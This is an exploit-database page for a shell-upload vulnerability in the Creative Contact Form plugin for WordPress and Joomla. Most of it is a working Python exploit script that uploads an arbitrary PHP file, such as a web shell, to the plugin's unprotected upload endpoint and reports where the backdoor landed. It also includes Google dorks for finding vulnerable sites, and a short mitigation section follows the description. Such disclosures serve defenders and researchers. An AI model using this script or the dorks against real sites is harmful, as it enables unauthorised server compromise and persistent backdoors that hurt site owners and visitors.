header-logo
Suggest Exploit
vendor:
Creative Contact Form
by:
Gianni Angelozzi
7.5
CVSS
HIGH
Shell Upload
CWE
Product Name: Creative Contact Form
Affected Version From: Wordpress plugin version <= 0.9.7, Joomla extension version <= 2.0.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: BackBox 3.x

WordPress and Joomla Creative Contact Form Shell Upload Vulnerability

This exploit allows an attacker to upload a shell to a website using the Creative Contact Form plugin in Wordpress version <= 0.9.7 or the Creative Contact Form extension in Joomla version <= 2.0.0. The vulnerability was discovered by Gianni Angelozzi. The exploit was written by Claudio Viviani. The exploit works by creating a multipart header with the payload and sending it to the target website.

Mitigation:

Update the Creative Contact Form plugin or extension to the latest version. Remove any unnecessary file upload functionality or restrict file types that can be uploaded. Regularly monitor for unauthorized file uploads.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
#               Wordpress plugin version: <= 0.9.7
#               Joomla extension version: <= 2.0.0
# 
# Vulnerability discovered by Gianni Angelozzi
#
# Exploit written by Claudio Viviani
#
# Dork google wordpress:  inurl:inurl:sexy-contact-form
# Dork google joomla   :  inurl:com_creativecontactform
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2, sys, mimetypes
# Args management
import optparse
# file management
import os, os.path

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'

# Create multipart header
def create_body_sh3ll_upl04d(payloadname):

   getfields = dict()

   payloadcontent = open(payloadname).read()

   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'

   L = []
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)

   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body

banner = """


  ___ ___               __                            __,-,__                                  
 |   Y   .-----.----.--|  .-----.----.-----.-----.   |  ' '__|                                 
 |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|   |     __|                                 
 |. / \  |_____|__| |_____|   __|__| |_____|_____|   |_______|                                 
 |:      |    _______     |__|             __           |_|                                    
 |::.|:. |   |   _   .-----.-----.--------|  .---.-.                                           
 `--- ---'   |___|   |  _  |  _  |        |  |  _  |                                           
             |.  |   |_____|_____|__|__|__|__|___._|                                           
             |:  1   |                                                                         
             |::.. . |                                                                         
             `-------'      
  _______                  __   __                 _______             __              __
 |   _   .----.-----.---.-|  |_|__.--.--.-----.   |   _   .-----.-----|  |_.---.-.----|  |_    
 |.  1___|   _|  -__|  _  |   _|  |  |  |  -__|   |.  1___|  _  |     |   _|  _  |  __|   _|   
 |.  |___|__| |_____|___._|____|__|\___/|_____|   |.  |___|_____|__|__|____|___._|____|____|   
 |:  1   |       _______                          |:  1   |                                    
 |::.. . |      |   _   .-----.----.--------.     |::.. . |                                    
 `-------'      |.  1___|  _  |   _|        |     `-------'                                    
                |.  __) |_____|__| |__|__|__|                                                  
                |:  |                                                                          
                |::.|                                                                          
                `---'                                                                          
                                                                                               

                                                     Cr3ative C0nt4ct Form Sh3ll Upl04d

                                     Discovered by:
                                     
                                    Gianni Angelozzi

                                      Written by:

                                    Claudio Viviani

                                 http://www.homelab.it

                                    info@homelab.it
                                homelabit@protonmail.ch

                            https://www.facebook.com/homelabit
                              https://twitter.com/homelabit
                            https://plus.google.com/+HomelabIt1/
                   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-c', '--cms', action="store",
                  help="Insert CMS Type: wordpress|joomla",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.file or not options.cms:
    print(banner)
    commandList.print_help()
    sys.exit(1)

payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
cmstype = options.cms

print(banner)

if options.cms == "wordpress":
   url_sexy_upload = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'
   backdoor_location = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/'

elif options.cms == "joomla":
   url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'
   backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'

else:
   print("[X] -c options require: 'wordpress' or 'joomla'")
   sys.exit(1)

content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

bodyupload = create_body_sh3ll_upl04d(payloadname)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }

try:
   req = urllib2.Request(url_sexy_upload, bodyupload, headers)
   response = urllib2.urlopen(req)

   if "error" in response.read():
      print("[X] Upload Failed :(")
   else:
      print("[!] Shell Uploaded")
      print("[!] "+backdoor_location+options.file)
except urllib2.HTTPError as e:
   print("[X] Http Error: "+str(e.code))
except urllib2.URLError as e:
   print("[X] Connection Error: "+str(e.code))

Navigation

Suggest Exploit

Services By CQR